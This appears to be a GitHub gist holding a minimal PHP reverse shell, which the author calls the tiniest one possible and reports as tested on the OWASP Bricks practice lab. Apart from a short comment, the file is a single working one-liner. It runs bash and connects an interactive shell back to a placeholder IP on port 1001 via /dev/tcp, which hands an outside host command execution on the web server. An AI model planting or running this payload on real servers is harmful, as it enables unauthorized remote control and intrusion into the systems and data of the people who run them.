This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | /* | |
| This is just a silly attempt to create the tiniest working PHP reverse shell possible. | |
| It's currently 55 characters, (including 11 chars for the IP Address), but all suggestions to minimise it further are welcome. | |
| Tested as working on OWASP Bricks, but should work on most LAMP stacks: https://www.owasp.org/index.php/OWASP_Bricks | |
| */ | |
| <?=`/bin/bash -c 'sh>&/dev/tcp/IP.XX.XX.XX/1001 0>&1'`; | |